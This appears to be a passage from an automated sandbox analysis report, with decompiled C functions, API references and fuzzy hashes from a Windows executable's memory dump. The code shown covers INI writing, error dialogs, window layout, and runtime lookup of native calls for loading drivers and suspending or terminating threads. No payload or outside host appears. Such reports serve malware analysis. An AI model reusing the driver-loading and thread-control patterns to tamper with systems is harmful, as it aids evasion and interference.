					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}




                                                                                                                0x00409d5f
                                                                                                                0x00409d67
                                                                                                                0x00409d70
                                                                                                                0x00409ddb
                                                                                                                0x00409d72
                                                                                                                0x00409d74
                                                                                                                0x00409db2
                                                                                                                0x00409d84
                                                                                                                0x00409d84
                                                                                                                0x00409d8c
                                                                                                                0x00409d8d
                                                                                                                0x00409d98
                                                                                                                0x00409d9d
                                                                                                                0x00409d9e
                                                                                                                0x00409da6
                                                                                                                0x00409daf
                                                                                                                0x00409daf
                                                                                                                0x00409dc3
                                                                                                                0x00409dc3

                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 00409D79
                                                                                                                • _snwprintf.MSVCRT ref: 00409D9E
                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                                                • GetPrivateProfileStringW.KERNEL32 ref: 00409DD4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                • String ID: "%s"
                                                                                                                • API String ID: 1343145685-3297466227
                                                                                                                • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                                                                • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 38%
                                                                                                                			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}








                                                                                                                0x004047d2
                                                                                                                0x004047da
                                                                                                                0x004047e0
                                                                                                                0x004047e4
                                                                                                                0x004047ec
                                                                                                                0x004047ec
                                                                                                                0x004047f5
                                                                                                                0x00404800
                                                                                                                0x00404801
                                                                                                                0x00404802
                                                                                                                0x0040480d
                                                                                                                0x00404812
                                                                                                                0x00404813
                                                                                                                0x00404834

                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                                                                • _snwprintf.MSVCRT ref: 00404813
                                                                                                                • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                • API String ID: 313946961-1552265934
                                                                                                                • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                                                                • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}


























                                                                                                                0x004068ec
                                                                                                                0x004068f0
                                                                                                                0x004068f4
                                                                                                                0x004068ff
                                                                                                                0x00406902
                                                                                                                0x0040690a
                                                                                                                0x00406910
                                                                                                                0x00406911
                                                                                                                0x0040691b
                                                                                                                0x0040691e
                                                                                                                0x00406923
                                                                                                                0x0040692d
                                                                                                                0x0040692e
                                                                                                                0x00406933
                                                                                                                0x0040693d
                                                                                                                0x00406940
                                                                                                                0x00406949
                                                                                                                0x0040694a
                                                                                                                0x00406950
                                                                                                                0x00406956
                                                                                                                0x00406959
                                                                                                                0x0040695c
                                                                                                                0x00406964
                                                                                                                0x0040696d
                                                                                                                0x00406974
                                                                                                                0x0040697e
                                                                                                                0x00406989
                                                                                                                0x00406990
                                                                                                                0x00406998
                                                                                                                0x0040699b
                                                                                                                0x0040699f
                                                                                                                0x004069b8
                                                                                                                0x004069bc
                                                                                                                0x004069c4
                                                                                                                0x004069c7
                                                                                                                0x004069c7
                                                                                                                0x004069cb
                                                                                                                0x004069ce
                                                                                                                0x004069d4
                                                                                                                0x004069d4
                                                                                                                0x004069d9
                                                                                                                0x004069df
                                                                                                                0x004069e6
                                                                                                                0x004069ea
                                                                                                                0x004069ef
                                                                                                                0x004069f2
                                                                                                                0x004069f5
                                                                                                                0x00406a00
                                                                                                                0x00406a01
                                                                                                                0x00406a06
                                                                                                                0x00406a08
                                                                                                                0x00406a0b
                                                                                                                0x00406a10
                                                                                                                0x00406a16
                                                                                                                0x00406a25
                                                                                                                0x00406a25
                                                                                                                0x00406a18
                                                                                                                0x00406a1e
                                                                                                                0x00406a1e
                                                                                                                0x00406a27
                                                                                                                0x00406a2f
                                                                                                                0x00406a32
                                                                                                                0x00406a35
                                                                                                                0x00406a3b
                                                                                                                0x00406a41
                                                                                                                0x00406a47
                                                                                                                0x00406a4d
                                                                                                                0x00406a53
                                                                                                                0x00406a5d
                                                                                                                0x00406a6d

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                                                • memcpy.MSVCRT ref: 0040696D
                                                                                                                • memcpy.MSVCRT ref: 0040697E
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 975042529-0
                                                                                                                • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                                                • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

























                                                                                                                0x004097b1
                                                                                                                0x004097b9
                                                                                                                0x004097bb
                                                                                                                0x004097be
                                                                                                                0x004097c3
                                                                                                                0x004097ca
                                                                                                                0x004097de
                                                                                                                0x004097de
                                                                                                                0x004097e3
                                                                                                                0x004097e5
                                                                                                                0x004097e5
                                                                                                                0x004097ec
                                                                                                                0x004097f3
                                                                                                                0x004097f6
                                                                                                                0x004097fe
                                                                                                                0x00409802
                                                                                                                0x00409805
                                                                                                                0x0040980a
                                                                                                                0x0040980d
                                                                                                                0x00409810
                                                                                                                0x00409822
                                                                                                                0x00000000
                                                                                                                0x00409827
                                                                                                                0x0040982a
                                                                                                                0x004098da
                                                                                                                0x004098da
                                                                                                                0x004098dc
                                                                                                                0x004098e0
                                                                                                                0x004098e9
                                                                                                                0x004098ec
                                                                                                                0x004098f6
                                                                                                                0x004098f6
                                                                                                                0x004098e2
                                                                                                                0x00000000
                                                                                                                0x004098e2
                                                                                                                0x00409830
                                                                                                                0x00409833
                                                                                                                0x00409838
                                                                                                                0x0040983b
                                                                                                                0x0040983e
                                                                                                                0x0040985f
                                                                                                                0x0040985f
                                                                                                                0x00409861
                                                                                                                0x00409863
                                                                                                                0x0040989e
                                                                                                                0x004098b1
                                                                                                                0x004098b8
                                                                                                                0x004098c0
                                                                                                                0x004098c5
                                                                                                                0x004098d5
                                                                                                                0x00409865
                                                                                                                0x00409865
                                                                                                                0x00409865
                                                                                                                0x0040986c
                                                                                                                0x00409878
                                                                                                                0x0040987f
                                                                                                                0x0040988a
                                                                                                                0x0040988f
                                                                                                                0x0040988f
                                                                                                                0x0040986c
                                                                                                                0x00000000
                                                                                                                0x00409863
                                                                                                                0x00409840
                                                                                                                0x00409843
                                                                                                                0x00409846
                                                                                                                0x0040984b
                                                                                                                0x00409852
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409854
                                                                                                                0x0040985d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040985d
                                                                                                                0x00409894
                                                                                                                0x00000000
                                                                                                                0x00409894

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                                                • memset.MSVCRT ref: 00409805
                                                                                                                • memcpy.MSVCRT ref: 0040988A
                                                                                                                • memcpy.MSVCRT ref: 004098C0
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3641025914-0
                                                                                                                • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                                                • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}














                                                                                                                0x004067ac
                                                                                                                0x004067af
                                                                                                                0x004067b5
                                                                                                                0x004067ba
                                                                                                                0x004067bf
                                                                                                                0x004067c1
                                                                                                                0x004067c6
                                                                                                                0x004067c7
                                                                                                                0x004067cc
                                                                                                                0x004067cd
                                                                                                                0x004067d2
                                                                                                                0x004067d4
                                                                                                                0x004067d9
                                                                                                                0x004067da
                                                                                                                0x004067df
                                                                                                                0x004067e0
                                                                                                                0x004067e5
                                                                                                                0x004067e7
                                                                                                                0x004067ec
                                                                                                                0x004067ed
                                                                                                                0x004067f2
                                                                                                                0x004067f3
                                                                                                                0x004067f8
                                                                                                                0x004067fa
                                                                                                                0x004067ff
                                                                                                                0x00406800
                                                                                                                0x00406805
                                                                                                                0x00406806
                                                                                                                0x00406808
                                                                                                                0x0040680f
                                                                                                                0x00406810
                                                                                                                0x00406812
                                                                                                                0x00406817
                                                                                                                0x0040681e
                                                                                                                0x00406828
                                                                                                                0x0040682b
                                                                                                                0x0040682c
                                                                                                                0x0040681e
                                                                                                                0x00406835
                                                                                                                0x00406839
                                                                                                                0x00406841

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                                                • free.MSVCRT(00000000), ref: 00406839
                                                                                                                  • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2241099983-0
                                                                                                                • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                                                • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}









                                                                                                                0x00405d03
                                                                                                                0x00405d06
                                                                                                                0x00405d10
                                                                                                                0x00405d17
                                                                                                                0x00405d22
                                                                                                                0x00405d32
                                                                                                                0x00405d40
                                                                                                                0x00405d48
                                                                                                                0x00405d4e
                                                                                                                0x00405d54
                                                                                                                0x00405d59
                                                                                                                0x00405d5c
                                                                                                                0x00405d61
                                                                                                                0x00405d67

                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 00405D0A
                                                                                                                • GetWindowRect.USER32 ref: 00405D17
                                                                                                                • GetClientRect.USER32 ref: 00405D22
                                                                                                                • MapWindowPoints.USER32 ref: 00405D32
                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                • String ID:
                                                                                                                • API String ID: 4247780290-0
                                                                                                                • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                                                • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}











                                                                                                                0x004083dc
                                                                                                                0x004083e2
                                                                                                                0x004083e9
                                                                                                                0x004083ea
                                                                                                                0x004083eb
                                                                                                                0x004083f3
